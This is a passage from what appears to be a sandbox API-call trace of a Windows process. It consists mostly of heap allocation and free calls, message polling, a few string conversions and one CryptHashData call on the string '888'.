0x2e54e58 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0251.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0251.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0251.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0251.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0251.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.952] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0251.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0251.953] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0251.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0251.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.953] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0251.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0251.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.954] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51748 [0251.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51748, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0251.954] CryptHashData (hHash=0xa87310, pbData=0x2e54ec8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0251.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0251.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0251.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0251.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0251.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0251.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.998] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0251.999] 